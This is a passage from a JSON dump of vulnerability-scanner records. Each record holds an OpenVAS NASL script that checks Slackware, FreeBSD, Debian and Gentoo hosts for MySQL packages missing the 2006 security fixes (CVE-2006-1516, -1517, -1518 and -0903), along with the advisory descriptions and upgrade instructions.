The MySQL package previously in\nSlackware -current also suffered from these flaws, but an additional\noverflow could allow arbitrary code execution.\n\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-129-02.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-129-02\";\n \nif(description)\n{\n script_id(56730);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-129-02 mysql \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"mysql\", ver:\"4.1.19-i486-1\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-26T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:56850", "href": "http://plugins.openvas.org/nasl.php?oid=56850", "type": "openvas", "title": "FreeBSD Ports: mysql-server", "sourceData": "#\n#VID 4913886c-e875-11da-b9f4-00123ffe8333\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: mysql-server\n\nCVE-2006-1516\nThe check_connection function in sql_parse.cc in MySQL 4.0.x up to\n4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote\nattackers to read portions of memory via a username without a trailing\nnull byte, which causes a buffer over-read.\n\nCVE-2006-1517\nsql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and\n5.0.x up to 5.0.20 allows remote attackers to obtain sensitive\ninformation via a COM_TABLE_DUMP request with an incorrect packet\nlength, which includes portions of memory in an error message.\n\nCVE-2006-1518\nBuffer overflow in the open_table function in sql_base.cc in MySQL\n5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary\ncode via crafted COM_TABLE_DUMP packets with invalid length values.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware 
upgrades.\n\nhttp://www.wisec.it/vulns.php?page=7\nhttp://www.wisec.it/vulns.php?page=8\nhttp://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html\nhttp://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html\nhttp://secunia.com/advisories/19929/\nhttp://www.vuxml.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html\nhttp://www.vuxml.org/freebsd/4913886c-e875-11da-b9f4-00123ffe8333.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56850);\n script_version(\"$Revision: 4144 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-26 07:28:56 +0200 (Mon, 26 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: mysql-server\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"mysql-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.0\")>0 && revcomp(a:bver, b:\"4.0.27\")<0) {\n txt += 'Package mysql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"4.1\")>0 && revcomp(a:bver, b:\"4.1.19\")<0) {\n txt += 'Package mysql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"5.1\")>0 && revcomp(a:bver, b:\"5.1.9\")<=0) {\n txt += 'Package mysql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-129-02.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231056730", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231056730", "type": "openvas", "title": "Slackware Advisory SSA:2006-129-02 mysql", "sourceData": "# OpenVAS Vulnerability 
Test\n# $Id: esoft_slk_ssa_2006_129_02.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.56730\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2006-129-02 mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK10\\.2\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-129-02\");\n\n script_tag(name:\"insight\", value:\"New mysql packages are available for Slackware 10.2 and -current to\nfix security issues. The MySQL package shipped with Slackware 10.2\nmay possibly leak sensitive information found in uninitialized\nmemory to authenticated users. The MySQL package previously in\nSlackware -current also suffered from these flaws, but an additional\noverflow could allow arbitrary code execution.\n\nSince the vulnerabilities require a valid login and/or access to the\ndatabase server, the risk is moderate. Slackware does not provide\nnetwork access to a MySQL database by default.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2006-129-02.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"mysql\", ver:\"4.1.19-i486-1\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update to mysql\nannounced via advisory DSA 1071-1.", "modified": "2017-07-07T00:00:00", "published": 
"2008-01-17T00:00:00", "id": "OPENVAS:56788", "href": "http://plugins.openvas.org/nasl.php?oid=56788", "type": "openvas", "title": "Debian Security Advisory DSA 1071-1 (mysql)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1071_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1071-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase.
The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\nImproper handling of SQL queries containing the NULL character\nallow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\nUsernames without a trailing null byte allow remote attackers to\nread portions of memory.\n\nCVE-2006-1517\n\nA request with an incorrect packet length allows remote attackers\nto obtain sensitive information.\n\nCVE-2006-1518\n\nSpecially crafted request packets with invalid length values allow\nthe execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\nwoody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\";\ntag_summary = \"The remote host is missing an update to mysql\nannounced via advisory DSA 1071-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201071-1\";\n\nif(description)\n{\n script_id(56788);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850,17780);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1071-1 (mysql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-doc\", ver:\"3.23.49-8.5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient10\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient10-dev\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"3.23.49-8.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update to mysql-dfsg-4.1\nannounced via advisory DSA 1073-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56789", "href": "http://plugins.openvas.org/nasl.php?oid=56789", "type": "openvas", "title": "Debian Security Advisory 
DSA 1073-1 (mysql-dfsg-4.1)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1073_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1073-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase.
The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\nImproper handling of SQL queries containing the NULL character\nallow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\nUsernames without a trailing null byte allow remote attackers to\nread portions of memory.\n\nCVE-2006-1517\n\nA request with an incorrect packet length allows remote attackers\nto obtain sensitive information.\n\nCVE-2006-1518\n\nSpecially crafted request packets with invalid length values allow\nthe execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\nwoody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\";\ntag_summary = \"The remote host is missing an update to mysql-dfsg-4.1\nannounced via advisory DSA 1073-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201073-1\";\n\nif(description)\n{\n script_id(56789);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850,17780);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1073-1 (mysql-dfsg-4.1)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mysql-common-4.1\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient14\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient14-dev\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client-4.1\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server-4.1\", ver:\"4.1.11a-4sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "The remote host is missing an update to mysql-dfsg\nannounced via advisory DSA 1079-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56833", "href": "http://plugins.openvas.org/nasl.php?oid=56833", "type": "openvas", "title": "Debian Security Advisory DSA 1079-1 (mysql-dfsg)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: 
deb_1079_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1079-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase.
The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\nImproper handling of SQL queries containing the NULL character\nallow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\nUsernames without a trailing null byte allow remote attackers to\nread portions of memory.\n\nCVE-2006-1517\n\nA request with an incorrect packet length allows remote attackers\nto obtain sensitive information.\n\nCVE-2006-1518\n\nSpecially crafted request packets with invalid length values allow\nthe execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\nwoody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\";\ntag_summary = \"The remote host is missing an update to mysql-dfsg\nannounced via advisory DSA 1079-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201079-1\";\n\nif(description)\n{\n script_id(56833);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0903\", \"CVE-2006-1516\", \"CVE-2006-1517\", \"CVE-2006-1518\");\n script_bugtraq_id(16850,17780);\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1079-1 (mysql-dfsg)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient12\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmysqlclient12-dev\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"4.0.24-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1517", "CVE-2006-1516"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200605-13.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:56728", "href": "http://plugins.openvas.org/nasl.php?oid=56728", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200605-13 (MySQL)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# 
Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A MySQL server may leak information to unauthorized users.\";\ntag_solution = \"All MySQL users should upgrade to the latest version.\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/mysql-4.0.27'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200605-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=132146\nhttp://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-05/msg00041.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200605-13.\";\n\n \n\nif(description)\n{\n script_id(56728);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-1516\", \"CVE-2006-1517\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 
200605-13 (MySQL)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-db/mysql\", unaffected: make_list(\"ge 4.1.19\", \"rge 4.0.27\"), vulnerable: make_list(\"lt 4.1.19\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": 